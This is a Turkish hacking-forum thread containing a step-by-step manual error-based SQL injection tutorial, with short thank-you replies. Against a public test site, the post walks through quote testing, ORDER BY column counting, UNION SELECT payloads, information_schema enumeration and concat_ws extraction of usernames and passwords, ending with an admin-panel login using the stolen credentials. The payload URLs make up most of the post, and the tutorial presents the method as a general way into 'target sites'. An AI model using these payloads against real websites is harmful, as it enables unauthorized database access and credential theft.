Merhaba Ziyaretçi !
GİRİŞ YAP KAYIT OL
Kartal Hack Team - Cyber Security | GİRİŞ PANELİ
Kullanıcı Adı:
Şifre: Şifrenimi Unuttun?
 
Örnek Resim

Kartal Hack Team - Cyber Security

  • KURALLAR
    • FORUM
    • PORTAL
  • ÖNE ÇIKAN KONULAR
  • Hack Araçları
  • Ücretsiz Upload Siteleri
    • afilez
KartalHackTeam Telif Bildirimi : Mail: kartalhackteamtr@gmail.com
  1. Kartal Hack Team - Cyber SecurityManuel SQL İnjection (Hata Tabanlı)

Konuyu Oyla:
  • Toplam: 0 Oy - Ortalama: 0
  • 1
  • 2
  • 3
  • 4
  • 5

Manuel SQL İnjection (Hata Tabanlı)

Kripton
Ziyaretçiler
 
Teşekkürler:
mesaj içinde teşekkür verildi.
#1
30-01-2019 Saat:11:42
Merhaba değerli üyelerimiz,

Bu konumla beraber manuel olarak Hata Tabanlı SQL İnjection nasıl yapılır sorusuna yanıt alacak ve kavramış olacaksınız. Uygulamalı olarak anlatım yapıyorum... Daha fazla beklemeden başlayalım....

Hata Tabanlı SQL İnjection !


İlk olarak hedef sitemize gidiyoruz Linkleri görebilmek için Üye Olun veya Giriş Yapın.

cJQCe3.png

Ardından site URL'sinin sonuna tırnak (') işareti atıyoruz ve enterlıyoruz. Eğer ki sitemizde SQL açığı var ise aşağıdaki gibi bir hata alacağız.

9OSTAI.png

Hatayı gördükten sonra link üzerinden tırnak (') işaretini silip linkin sonuna "+order+by+1" yazıyoruz enterladıktan sonra site aynı hatayı vermiyorsa aynı hatayı alana kadar kadar sondaki 1 rakamını 2,3,4,5,6,7.... ile değiştirip enterlıyoruz. Aşağıdaki gibi;

Kod:
http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+1
Kod:
http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+2
Kod:
http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+3
Kod:
http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+4
Kod:
http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+5
.
.
.
Kod:
http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+12

Bizim hedef sitemizde sona 12 yazdığımızda aynı hatayı tekrar aldık. Bu da demek oluyor ki sitemizde 11 adet kolon var. Eğer hatayı 30 yazdığımızda alsaydık sitemizde 29 adet kolon var diyecektik. Ancak hatayı 12'de aldık.

PnUwfe.png

Şimdiki işlemimiz site sonuna "union+all+select+" ekleyip en sona sitedeki kolon sayısına kadar olan sayıları yazıyoruz. Mesela biz az önce sitede 11 adet kolon bulduk. Yani URL'yi şu şekilde düzenleyip enter yapacağız.

Kod:
http://testphp.vulnweb.com/listproducts.php?cat=1+union+all+select+1,2,3,4,5,6,7,8,9,10,11


Bunu yaptıktan sonra URL'nin en sonuna (yani 11'in sonuna) "--" sembollerini koyuyoruz. Ve "cat=1" yazan yerde ID değerimizin yani 1'in başına "-" işaretini koyup enter diyoruz. Linkimizin son hali bu şekilde olacak;

Kod:
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+all+select+1,2,3,4,5,6,7,8,9,10,11--

Enter dedikten sonra karşımıza bu şekilde bir sayfa çıkacak;

V1ka9K.png

buradaki sayılar şunu ifade ediyor;

7 rakamı 7. sütunda resim başlık bilgisini
2 rakamı 2. sütunda resim açıklamasını
9 rakamı 9. sütunda resmi yapan kişinin bilgisini getiriyor..

Biz bundan sonra yapacağımız işlemleri 7 , 2 ve 9. sütundan yapacağız. Sitenin hangi sürümü kullandığını bulabilmek için 7. kolonu URL'mizde şu şekilde değiştiriyoruz;
7 yazan yere "version()" yazarak enter yapıyoruz şu şekilde;

Kod:
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+all+select+1,2,3,4,5,6,version(),8,9,10,11--

rTitCZ.png

Gördüğünüz gibi sitenin sürüm bilgisi karşımızda bu bilgiyi öğrendikten sonra şu işlemi yapıyoruz. "version()" yazdığımız yere "table_name" yazarak site URL'sinin sonuna "+from+information_schema.tables" yazarak enter diyelim. URL'miz şu şekilde olacak;

Kod:
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+all+select+1,2,3,4,5,6,table_name,8,9,10,11+from+information_schema.tables--

Ve Karşımıza şu şekilde bir sayfa çıkacak;

G26opy.png

Bu sayfa sitede bulunan tabloları bize göstermekte. Bizim çekmek istediğimiz admin bilgileri olduğu için "users" tablosu üzerinden devam edeceğiz. URL'mizi şu şekilde düzenliyoruz.

"table_name" yazdığımız yere "column_name" yazıyoruz ardından linkin sonunda bulunan "schema.tables"i "schema.columns+where+table_name="users"" şeklinde değiştiriyoruz. URL'mizin son hali aşağıdaki gibi olacaktır;

Kod:
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+all+select+1,2,3,4,5,6,column_name,8,9,10,11+from+information_schema.columns+where+table_name=%22users%22--

Enter dedikten sonra karşımıza bu sayfa çıkacaktır;

PgwFtr.png

Burada karşımıza uname , pass , cc adı verilen bilgiler sitem tablosu içinde yer alan kolon bilgileridir. Bunlar sistemin admin , parola bilgilerini içermektedir. Kolonların içerisindeki bilgilere ulaşabilmek için URL'yi aşaıdaki gibi düzenliyoruz ;

"column_name" yazan yeri "concat_ws(0x3a,uname,pass)" şeklinde değiştiriyoruz. Linkin sonundaki "11" yazan yerden sonrasını silip "+from+users--" yazıyoruz. ve enter diyoruz. URL'miz aşağıdaki hali alacaktır;

Kod:
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+all+select+1,2,3,4,5,6,concat_ws(0x3a,uname,pass),8,9,10,11+from+users--

Karşımıza çıkan sayfada sitenin admin bilgilerini göreceğiz;

zvUvMe.png

Bu bilgileri alıp sitenin admin panel girişinde  gerekli yerlere yazdıktan sonra sitenin admin paneline giriş yapmış bulunacağız.

vP7CIF.png

Bu şekilde Hata tabanlı SQL İnjection işlemini tamamlamış olduk. Kolay gelsin....
Konu Kripton tarafından Özgün Olarak Yazılmıştır / Anlatılmıştır.
Cevapla
admin Çevrimdışı
Mareşal
Administrator
Yorum Sayısı: 181

Konu Sayısı: 92

Üyelik Tarihi: 06-05-2008

Rep Puanı: 3
Kayan Yazı: Benim Unuttuklarımı Siz Daha Yeni Öğreniyorsunuz..
Kayan Yazı Rengi: white
Teşekkürler:
103 mesaj içinde teşekkür verildi.
#2
30-01-2019 Saat:16:23
Özgün bir anlatım
//Sabit
Merak Edilicek Bir Yanimiz Yok. Siradan Biriyiz.. Bahsedilicek Kadar Ozel, Bahsi Edilmeyecek Kadar Eskiyiz !
WWW
Cevapla
Kripton
Ziyaretçiler
 
Teşekkürler:
mesaj içinde teşekkür verildi.
#3
04-02-2019 Saat:00:19
teşekkürler ++++
Cevapla
Bir.Nefes Çevrimdışı
Sosyal Medya Tim Lideri
*
Yorum Sayısı: 77

Konu Sayısı: 15

Üyelik Tarihi: 03-02-2019

Rep Puanı: 0
Teşekkürler:
95 mesaj içinde teşekkür verildi.
#4
05-02-2019 Saat:18:56
Eline sağlık
Cevapla
« Önceki Konu | Sonraki Konu »


  • Konuyu Yazdır
  • Konuyu Takip Et
Hızlı Menü:


Şu anda bu konuyu okuyanlar: 1 Ziyaretçi

@kartalhackteam.10tl.net


#Hakkımızda

Sitemiz, hukuka, yasalara, telif haklarına ve kişilik haklarına saygılı olmayı amaç edinmiştir. Sitemiz, 5651 sayılı yasada tanımlanan .yer sağlayıcı. olarak hizmet vermektedir. İlgili yasaya göre, site yönetiminin hukuka aykırı içerikleri kontrol etme yükümlülüğü yoktur. Bu sebeple, sitemiz .uyar ve kaldır. prensibini benimsemiştir. .

#Dost Siteler

  • AYYILDIZ TİM|SESSİZCE NÖBETTEYİZ

#Vip Bölüm

  • #Premium Üyeler
  • # Yer Altı Dünyası
  • # Wares Scriptler
  • # Yazılım Dilleri

#Uyarı !

Telif hakkına konu olan eserlerin yasal olmayan bir biçimde paylaşıldığını ve yasal haklarının çiğnendiğini düşünen hak sahipleri veya meslek birlikleri, admin@ille3galizm.com mail adresinden bize ulaşabilirler. Buraya ulaşan talep ve şikayetler Hukuk Müşavirimiz tarafından incelenecek, şikayet yerinde görüldüğü takdirde ihlal olduğu düşünülen içerikler sitemizden kaldırılacaktır.

kartalhackteam.10tl.net |

[~root kartalhackteam.10tl.net~]






Yasal Uyarı | Sitemizin Çizgisi | Kullanım Sartları ve Üyelik Sözleşmesi | Telif Hakları Politikası / Copyright Policy | Kartalhackteam.10tl.net .NET
Tam Görünüm
Konu Görünümü


10tl.net Destek Forumu -

Online Shopping App
Online Shopping - E-Commerce Platform
Online Shopping - E-Commerce Platform
Feinunze Schmuck Jewelery Online Shopping